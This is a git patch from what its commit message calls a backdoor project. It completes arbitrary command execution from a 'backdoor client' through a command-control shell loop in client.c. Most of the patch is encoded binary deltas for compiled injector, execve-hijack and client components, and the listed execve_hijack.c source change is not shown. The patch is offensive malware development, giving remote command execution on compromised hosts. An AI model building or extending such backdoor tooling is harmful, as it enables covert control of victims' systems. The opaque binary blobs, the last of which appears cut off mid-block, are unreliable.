From 0e022a838541b1714da06d6e6facc50863f76d33 Mon Sep 17 00:00:00 2001
From: h3xduck <marcossanchezbajo@gmail.com>
Date: Fri, 18 Feb 2022 04:06:18 -0500
Subject: [PATCH] Completed execution of arbitrary commands sent from the
 backdoor client

---
 src/client/client.c         |   5 ++++-
 src/client/client.o         | Bin 9664 -> 9832 bytes
 src/client/injector         | Bin 41792 -> 41824 bytes
 src/helpers/execve_hijack   | Bin 37488 -> 37664 bytes
 src/helpers/execve_hijack.c |  30 +++++++++++++++++++++++++++++-
 src/helpers/execve_hijack.o | Bin 4896 -> 6016 bytes
 6 files changed, 33 insertions(+), 2 deletions(-)

diff --git a/src/client/client.c b/src/client/client.c
index 2bea0c6..5173646 100644
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -162,7 +162,10 @@ void activate_command_control_shell(char* argv){
     while(1){
         char buf[BUFSIZ];                                                                                                                                                          
         printf(""KYLW"c>:"RESET"");                                                                                                                                                              
-        scanf("%s", buf);                                                                                                                                                                             
+        fgets(buf, BUFSIZ, stdin);
+        if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){
+            buf[strlen(buf)-1] = '\0';   
+        }                                                                                                                                                                         
         
         char msg[BUFSIZ];
         strcpy(msg, CC_PROT_MSG);
diff --git a/src/client/client.o b/src/client/client.o
index 6fd778d2b90a3d466ba5a90c596e8056db245382..bc46424c3f7f22f52c1b6a1a2aeb97bba1fc8ef1 100644
GIT binary patch
delta 1317
zcmZ`(T}TvB6ux(M-EI77blrBE+-+xn#0_7XUN%JhL4-u1Lc<i27TiP&S({y=9}-Fh
zi6}WQ`4|NGR<dH$Ls}2zTR(3JMIpfw1^HAD#&*yA#3AayJ$vu>o%4NX?kuz3Tk5-=
z;-%#S%U<b(v@jBepWZ{68+(|DBR6Niua(PBnJ)J8FG~bdR@uyYzQw8dLtZa&Wp$<k
zyILy?4ga8D*le+@;vV;Y{#7o+lpKQhysB93Z}HXkXD3I;C&%<gvl87Hj8rF!muiM3
z#q@|{_wL#`sjJ54nJ8{41&Nz56iD;qU<6b?Xyp;iT9z{wV4TT*ONGrz_V0vMle6*#
zD__N2)a!eBz|0G4c4jP_H<_6~e=a)-7lX~krQk#V^jEJffI9oc+9}(?Dr_9-27*Tj
z9wvC}fA9jqBcy)C#^HXru1E0+LIlo$m+=IX2+hH9hFxO0vvm+WMDU})BPt(&ZIMrd
zA#&E*n~;g9+GWzEk*<%h5K*VU5SDs*oQuX8sz_IdgS#__oqOyi^(g7iJV<cdy7-Qb
zL(~2`!-vKqP%0{xTT|oUu2-Mq6@a>^s%eDPNmny;M%7FU(F_u{pWrCxdYvLTone%?
z;On{K%rI`vkRz;4)UM$S+5*wsOV|f66;=6TFm%;eBMLE6vq5n5U2%Nh!W*HyNm$yo
z1zcD8H>}}5P+yZ}(JTVn>HXKkwyyRxIjnobKIdO+kgmAsbZ=?kulk@<KLpQ&*ICj<
zy$a~X=RuA=l4L(TkA2{`;BGuE>(*C^u_gEvPfM?4=!}QpU?SyibBPpx4U36(sY-#(
zM4MzNc1bcN9admC*~U-8VzQlYz`JC-e5@9qRD9YX)|i&>)Z3?7$cR%8A45bQVu|Q)
Dl9YU`

delta 1155
zcmZ`%O=uHA6yBL8o5m*FG;KOrO*We*E76cc@DK{p7=MszJOpoohFEQ>lt_u9cxfV7
zf1segi=dYl1i^!ZEeMJ~K}57(dh;N9@M3ROP>T3Blgz>+&<8sM-}k=vz4vCn7GEB|
znIe0dJDM))r?*Z-;Gr4<zdPz$xU&8N9#Lj5xR(gc{I#>5<Em!Wl%uDsr>3h@rd8Ww
z-}BdLf4WCelml8|p6>IjJtKBHaGsJhECzGr7*v8xuMkBEDnx0iJdwvd?c9@sB{S`_
z);=%Ujlq*dE0?EhXD3ES%e9G0brOCIrR_*)*)#Xk)e#E4FnuBp5$?_<=&k(w{jU=l
zgl|Lm48lVQe<N|H{xeyBwS(_fgh4M7Y@kBJ2=~ZIokH(rAs@7&Ob>Ul`z0G~v*|AO
zmt=QA++g~hE|$ubEJ4X&*{6~fU?1vdqe~T$sz1V!^h48NbITqs;2|jSIZJ$w@F>Dx
zOWc{UC~Lk$`NGzzvx@Q!gn#MaJKLs%i1>~Q4I#V_W@AhbiFe>3Tya|wSd1|ehk+RL
zr(}+3(SRc{2E~|<i~}*5K85tc$Z2yHvYfqulrhBCp<*&}16n4_-rgkVF2cpzeUyv2
zFH{gVeX!f~>8(xtSA>7|b5{*j{%C7RWum@(P>M5sz{?>X!Vs@M0pIvc8N>#7hBI*i
zn(@c9rNWt!PvjtsCvx5gV&6P2!u3RsT!mI5&rg!flWR~&=IJX9E+@z6ng*r7Fnma+
u=(+~f8Y2NHSb1VX!^(Smg$a)^ytQ&(Q#>t?26(sUpl<cja|#?v82<qSRw%dt

diff --git a/src/client/injector b/src/client/injector
index 20d20208a6c43f0b321ad19939cb3f138981891c..b5eb2d9dbcf6b344fdb54bba9048d3be23d1971c 100755
GIT binary patch
delta 4255
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
DO{zdw

delta 4116
zcmZWs3s_Xu7T){J3@>>M3e51F86LtYuQAb7xPS%@2wcoCzrJ`0n4qEwc<YuSa?!>C
z6_;k2TIjt#(#q>tcK!Mi%tXryEtQN6)NJS?B4v`|J$LPW&QN}BKGxdjUu*qq?dLhu
zeM)FOC2WkMDb2>cuKPR)Z~L0RiF3Q4mmV(YVKl9zt88`jF7?@#lh9DIzPR95&)xxX
z{n3B5rwb}*R7?t}LvN)b3}poVkHvqtD|bhqEBj&zbSw1GDkz~-simP%r_w;YQmcBJ
z5~7EH3uB-N@yCHGHFOI!E92<%tPgL#t^}ph2L_Z{$XzG(^(rl0#XW!F@&=b`#z~j+
zsP3KIllHME)pL#<bUpW6$mN?{zQZIebJEhathWh^*vk!<xuL^Jt6Dn}ejliFT<}*o
zDsK`%qKdGCO(`it(Jzz@g?<Fh&Ki0Yik&sE&v}YxVPSdI(vm4t3ad(rD;Gewv%$5z
zvaGsrS@qIN@N+p$C&LAoa!7JD!a`TiLKPACACa~6L@`k$rclf2H09;EP%2`QvCYk|
zII&`;$<IFAt|001b4@_GD`U)sGp<(Z3wdrcJ=g*{S`@UoVYzPZu-(nwHsJOlrGB=z
z-RCH9)wGAzeoC)BL4=r_JmR=YS`86Cb#w>p^@*f4wl94uC>;Y+{c31F9P&#D*g7nV
z$1ydre}_GDQ^UajP+8jTAt3q%(P9YF3<|fML9HE2_rYZCuyEE168sYas<BFQ{mJ--
z*5|#=O-Ut2q_{F9ioG825C51%t2-+q=`4faKp6YCvHt-ZhP|Hy4Fktns#9pXHe#~<
zCW?>{V5F}=VZdwdz9R-<2-5r`z!>NiaXkt-p1F&;UO_etpT&T=2w?ro7->^NKja54
z4!58|N@-&5F>Gwsw4qY-cx42dNVUp71UCZ{{bw+S6~8ibL+b;k2%Ch7zrpmN-L+<{
zSDK^*o+N2cB)adv!~A^b&tNq)46rE6MHaP+85~Hv{op-OY;Wj7JDca;Pf<uU-9|Er
z_6p0~lvK-TAD3uH{Z6Zqd5sVAX21)<!L?nC1SyGqIg(gaC#Ms_=X4H|NqI6b?!U=a
z)qaPmXv7qYCaHvpe;WMik@B?M*2E^p+HjT)w8=LeIn0(XlsMjF5Ev3VDUuaG{}(hq
zG==&RmiPI<9-jT>P!*Cn|4ZE9c44FxGxn@$UG=T{1(vjaucK-GY*tS&YD?M>f41fg
znJwqcmJ=Vbp_?sV+QXQ+e&rCU@xz&Xn=u|jNE+O)pwnrl<?!OthRjW7ciaZ8$9#C~
zDHc8fZJ5(s(!n+edgxJqz;-7ZeSd*xbq0^CgKThU#cD3X8#*n$2_NVTqpXM@*CUs`
z4X*19v=E&16Fd|D;2l2*>H4X(8tU}%0n_l#wR`^TsO<^tnXN0;_ECfIncheb!5zI`
z@EQb-;StZN5(yT9C-OGTGlU9mgYcr^F^`kCc`^H#WgmQQXmI)%?{oVSm=}7KmVr7f
z&F}jGQM9CW*01ao`J}XmqQg_LC@kB1xL*|U<c`6qYGLRwoC!1eO})hey6RVU5pG(?
zOz(j@+z@NUuC$xZV5l{%6Vr;=<Cxi+&CZm&<4moA!th5mJ2>0H`jrR8nnFy}U_dtQ
zEqEuqLP+d~oXE()DrB&v9jRY=gm_ux!@QQcRrJHgNIkq5aa?e{2}xs<Xa&45c2;2J
zO%`yl_aq*r5#rf8jJOUxV;2c7eVjMB@6Wt*nAfB}<n7Uv{DhNdIf09b%bmRu_c5Es
z2k>%Kh_Le~o==1uQGXfL9qbtPMTj%jXuBs7V$C~(7t9K@V30H?|A7yU-_mS&b=*|p
zyd6B^!eMA!1ib_y<DaCpuwwjtdKSJJA4{9SC0dVtV|0-7Uw`B)2m?_XxDl5~^We?s
zZM4EREvAFg*T6k4#n*hDy9_O8Pr;YQansj0gd<QKH-+AV*W=a-=dVIbbOtPmk1~1b
z$j@FO_fntCYD%h#CM0!khUH>vUWVmP>JzD!;XHFwOew;1vWySR^?fe(TH6=#6TG0q
zBlmF1DTO+sip(jiEG@5mMjuh-MhIM)9&WogW4)sGrLRTt2?1YOmqf7|wW(7SH>19U
z`UvWeFN<O)>d<dRaR{{)b&!IP_faRJ9_SLqr&0TSFN&*B*Y=3wKT&^-`Xp-8HBszC
z{TPnb9beMlqK-zr=m$~EQj&3G4|WzK@Hd>VM$`p%Q9OvcAN5((;k`(Jdb7=Bo<@Vm
zBNs{YRId?ccsMCS74FV11Yd<D3%5)tSTc0<W!R5$3!Fh22)!9$!nI4_nHhrLJ29DI
z^ck3)slzXnXHhmnGa`-fUS^o^)pu|?Geo%i9o)+tOOwDbOGo1&73E$iMyY{1loOz3
zmd<ePswn=5Nk<A1uCO|IA#Ct(K@a){0L@|?hOC*Yc{pqpw0V?3N0ydGLT{E%I2{je
z*#&eXlxOQ`3s|xXX(#kz-vwNAlJVmzBL@@O%5%D?TYLyhN629%e%ts#S+3gcYN!OA
zQE_MsLI>De58GkNp-&LXA16WSQs5ngcE?K4Tas7AY=0VWOP)Qfz>lTGJQK}<$~=>B
z%K$BT$y5P7d7tCg#Jh86;ZW|+Jt|xcwH<jfOGQ(F=Fg?;U|xPU4T3%S%h3V>1uN(Q
zTXVrqm2fKxOr>@70N6?w(tKM`*)D}}J{npV7SRMSls`hZLSA_(b%tZ*1#}tsSCnF!
zmnzoK-8R*tr4*;HW^o?!f3~;)p>a!&xnP+;)T9cmf~e=-6);if-z^lm=f9XOpwFR~
zI^3w)R%h8uX*n3JI{(&qX{ahmkqX=;qw(YI02Eu7(iw2hs$&Bkv`&Z8MjzZR#f=(j
zg6A7`-lyeIIg&ieZL_#s0Bw!IW7H%^UV?JjX#?~$X<(qy#h4<0)Gfjz!<sYh3YK_X
zob<d=Qe+qB!$XgG+nMygj1kQ9sLVZH_Uz@>`?573uRGTENQ$UgW*W<+DHU_6i9aDl
zvQbt!h_g>-y^Q0A<*k^<z5vgz*WkA~G6e5JPgX;%R`TG74!doL^WO;>9kPdGdyT<~
zW$n6*J2vN38UGn^Z^56q6mhrT1r%@4m`3CIX8D%MgWW3IBN6vT3rUdxeB^BskILfK
zKmP<Ml-Y9S6)cmZma-_in#-;5%?4d<Zjo$~)l9j1!ag0a$%{qy%Zyv`ie+t@q{s;w
zcbq7GC!p<tyh@H!8zaxc1@u?r3aE=XL9I+fNRLePR-go}K?2rp$hbn!A4#7~G%Vxs
zz7qbqq=+YObT*N_@&IPac({xQg-bv<=YNEdiL&9mJhF3gf^-=VkmnFxd3y>{n>BO^
zlcrU&kFy->*walieoMZMDrL@XJl4kLDK4*Yc?-@pYgG3!itjD_RYW&wXbcpiOa{{?
zjsH{ldSp8{rAVs6v2&N$iZ=xbwhfz&)b{C?#e(kP-*_oAvofa7D4Y;GnN(FTFDb5u
zfh|6^+*fl2+m3Bvlum@U*OT#g58WQ;z0p~scIXyJMRbCzggSH%)FHY`MjbjA+O{X-
ztxb2txpv~)m9<XWlpQmv@JSG?-WluWxJ*vR+m7u_7w{sZEypQd{cXD@yB2MdLh#r0
Q?#Zs*uS!oi)7y3b2LvG_s{jB1

diff --git a/src/helpers/execve_hijack b/src/helpers/execve_hijack
index db77074b5a8bb6a4c16b3facdd342ca35c1c48b7..96f454ebc8701f66c414cf1f3fcb67df61108594 100755
GIT binary patch
delta 6911
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
